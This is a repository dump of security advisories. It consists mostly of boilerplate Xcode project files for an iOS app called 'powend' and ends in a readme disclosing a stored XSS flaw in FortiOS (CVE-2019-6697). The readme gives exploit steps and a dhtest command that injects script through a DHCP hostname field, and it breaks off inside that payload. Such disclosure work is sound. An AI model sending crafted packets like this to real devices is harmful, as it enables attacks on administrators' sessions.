24 | "idiom" : "iphone",
25 | "size" : "40x40",
26 | "scale" : "2x"
27 | },
28 | {
29 | "idiom" : "iphone",
30 | "size" : "40x40",
31 | "scale" : "3x"
32 | },
33 | {
34 | "idiom" : "iphone",
35 | "size" : "60x60",
36 | "scale" : "2x"
37 | },
38 | {
39 | "idiom" : "iphone",
40 | "size" : "60x60",
41 | "scale" : "3x"
42 | },
43 | {
44 | "idiom" : "ipad",
45 | "size" : "20x20",
46 | "scale" : "1x"
47 | },
48 | {
49 | "idiom" : "ipad",
50 | "size" : "20x20",
51 | "scale" : "2x"
52 | },
53 | {
54 | "idiom" : "ipad",
55 | "size" : "29x29",
56 | "scale" : "1x"
57 | },
58 | {
59 | "idiom" : "ipad",
60 | "size" : "29x29",
61 | "scale" : "2x"
62 | },
63 | {
64 | "idiom" : "ipad",
65 | "size" : "40x40",
66 | "scale" : "1x"
67 | },
68 | {
69 | "idiom" : "ipad",
70 | "size" : "40x40",
71 | "scale" : "2x"
72 | },
73 | {
74 | "idiom" : "ipad",
75 | "size" : "76x76",
76 | "scale" : "1x"
77 | },
78 | {
79 | "idiom" : "ipad",
80 | "size" : "76x76",
81 | "scale" : "2x"
82 | },
83 | {
84 | "idiom" : "ipad",
85 | "size" : "83.5x83.5",
86 | "scale" : "2x"
87 | },
88 | {
89 | "idiom" : "ios-marketing",
90 | "size" : "1024x1024",
91 | "scale" : "1x"
92 | }
93 | ],
94 | "info" : {
95 | "version" : 1,
96 | "author" : "xcode"
97 | }
98 | }
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/Assets.xcassets/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "info" : {
3 | "version" : 1,
4 | "author" : "xcode"
5 | }
6 | }
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/Base.lproj/Main.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | APPL
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 | LSRequiresIPhoneOS
22 |
23 | UILaunchStoryboardName
24 | LaunchScreen
25 | UIMainStoryboardFile
26 | Main
27 | UIRequiredDeviceCapabilities
28 |
29 | armv7
30 |
31 | UISupportedInterfaceOrientations
32 |
33 | UIInterfaceOrientationPortrait
34 | UIInterfaceOrientationLandscapeLeft
35 | UIInterfaceOrientationLandscapeRight
36 |
37 | UISupportedInterfaceOrientations~ipad
38 |
39 | UIInterfaceOrientationPortrait
40 | UIInterfaceOrientationPortraitUpsideDown
41 | UIInterfaceOrientationLandscapeLeft
42 | UIInterfaceOrientationLandscapeRight
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/ViewController.h:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.h
3 | // powend
4 | //
5 | // Created by simo on 30/08/2018.
6 | // Copyright © 2018 simo ghannam. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface ViewController : UIViewController
12 |
13 |
14 | @end
15 |
16 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/ViewController.m:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.m
3 | // powend
4 | //
5 | // Created by simo on 30/08/2018.
6 | // Copyright © 2018 simo ghannam. All rights reserved.
7 | //
8 |
9 | #import "ViewController.h"
10 |
11 | @interface ViewController ()
12 |
13 | @end
14 |
15 | @implementation ViewController
16 |
17 | - (void)viewDidLoad {
18 | [super viewDidLoad];
19 | // Do any additional setup after loading the view, typically from a nib.
20 | }
21 |
22 |
23 | - (void)didReceiveMemoryWarning {
24 | [super didReceiveMemoryWarning];
25 | // Dispose of any resources that can be recreated.
26 | }
27 |
28 |
29 | @end
30 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/main.m:
--------------------------------------------------------------------------------
1 | //
2 | // main.m
3 | // powend
4 | //
5 | // Created by simo on 30/08/2018.
6 | // Copyright © 2018 simo ghannam. All rights reserved.
7 | //
8 |
9 | #import
10 | #import "AppDelegate.h"
11 |
12 | int main(int argc, char * argv[]) {
13 | @autoreleasepool {
14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/powend.entitlements:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | com.apple.security.application-groups
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/contents.xcworkspacedata:
--------------------------------------------------------------------------------
1 |
2 |
4 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | IDEDidComputeMac32BitWarning
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/xcuserdata/simo.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 3944/powend.xcodeproj/project.xcworkspace/xcuserdata/simo.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend.xcodeproj/xcuserdata/simo.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
8 |
20 |
21 |
22 |
24 |
36 |
37 |
38 |
40 |
52 |
53 |
54 |
56 |
66 |
67 |
68 |
69 |
70 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend.xcodeproj/xcuserdata/simo.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | powend.xcscheme
8 |
9 | orderHint
10 | 0
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powendTests/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | BNDL
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 |
22 |
23 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powendTests/powendTests.m:
--------------------------------------------------------------------------------
1 | //
2 | // powendTests.m
3 | // powendTests
4 | //
5 | // Created by simo on 30/08/2018.
6 | // Copyright © 2018 simo ghannam. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface powendTests : XCTestCase
12 |
13 | @end
14 |
15 | @implementation powendTests
16 |
17 | - (void)setUp {
18 | [super setUp];
19 | // Put setup code here. This method is called before the invocation of each test method in the class.
20 | }
21 |
22 | - (void)tearDown {
23 | // Put teardown code here. This method is called after the invocation of each test method in the class.
24 | [super tearDown];
25 | }
26 |
27 | - (void)testExample {
28 | // This is an example of a functional test case.
29 | // Use XCTAssert and related functions to verify your tests produce the correct results.
30 | }
31 |
32 | - (void)testPerformanceExample {
33 | // This is an example of a performance test case.
34 | [self measureBlock:^{
35 | // Put the code you want to measure the time of here.
36 | }];
37 | }
38 |
39 | @end
40 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powendUITests/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleExecutable
8 | $(EXECUTABLE_NAME)
9 | CFBundleIdentifier
10 | $(PRODUCT_BUNDLE_IDENTIFIER)
11 | CFBundleInfoDictionaryVersion
12 | 6.0
13 | CFBundleName
14 | $(PRODUCT_NAME)
15 | CFBundlePackageType
16 | BNDL
17 | CFBundleShortVersionString
18 | 1.0
19 | CFBundleVersion
20 | 1
21 |
22 |
23 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powendUITests/powendUITests.m:
--------------------------------------------------------------------------------
1 | //
2 | // powendUITests.m
3 | // powendUITests
4 | //
5 | // Created by simo on 30/08/2018.
6 | // Copyright © 2018 simo ghannam. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface powendUITests : XCTestCase
12 |
13 | @end
14 |
15 | @implementation powendUITests
16 |
17 | - (void)setUp {
18 | [super setUp];
19 |
20 | // Put setup code here. This method is called before the invocation of each test method in the class.
21 |
22 | // In UI tests it is usually best to stop immediately when a failure occurs.
23 | self.continueAfterFailure = NO;
24 | // UI tests must launch the application that they test. Doing this in setup will make sure it happens for each test method.
25 | [[[XCUIApplication alloc] init] launch];
26 |
27 | // In UI tests it’s important to set the initial state - such as interface orientation - required for your tests before they run. The setUp method is a good place to do this.
28 | }
29 |
30 | - (void)tearDown {
31 | // Put teardown code here. This method is called after the invocation of each test method in the class.
32 | [super tearDown];
33 | }
34 |
35 | - (void)testExample {
36 | // Use recording to get started writing UI tests.
37 | // Use XCTAssert and related functions to verify your tests produce the correct results.
38 | }
39 |
40 | @end
41 |
--------------------------------------------------------------------------------
/SSD Advisory - 3987/readme.md:
--------------------------------------------------------------------------------
1 | # SSD Advisory - Fortigate DHCP Stored XSS
2 |
3 | **Vulnerability Summary**
4 | The following advisory describes a Stored XSS Vulnerability found in Fortinet's Fortigate Firewall(FortiOS) via an unauthenticated DHCP packet.
5 |
6 | **CVE**
7 | CVE-2019-6697
8 |
9 | **Credit**
10 | An independent Security Researcher, Toshitsugu Yoneyama, has reported this vulnerability to SSD Secure Disclosure program.
11 |
12 | **Affected systems**
13 | FortiOS v6.0.4 build 0231.
14 |
15 | **Vendor Response**
16 | Fortigate has fixed the vulnerability in FortiOS version 6.2.2
17 |
18 | **Vulnerability Details**
19 | An unauthenticated attacker can trigger a Stored XSS Vulnerability via a malicious DHCP packet in the Fortigate DHCP Monitor. This can happen if Device Detection is enabled through Network >Interface > Edit Interface > Device Detection
20 |
21 | 
22 | When this option is enabled the attacker may perform the following steps in order to exploit the vulnerability:
23 |
24 | 1. Install dhtest or any other tool that can send arbitrary DHCP packets.
25 | (https://sargandh.wordpress.com/2012/02/23/linux-dhcp-client-simulation-tool/)
26 | 2. Send a malicious DHCP packet. For example:
27 |
28 | ```
29 | #./dhtest-master/dhtest -i eth0 -m 12:34:56:78:90:12 -h "x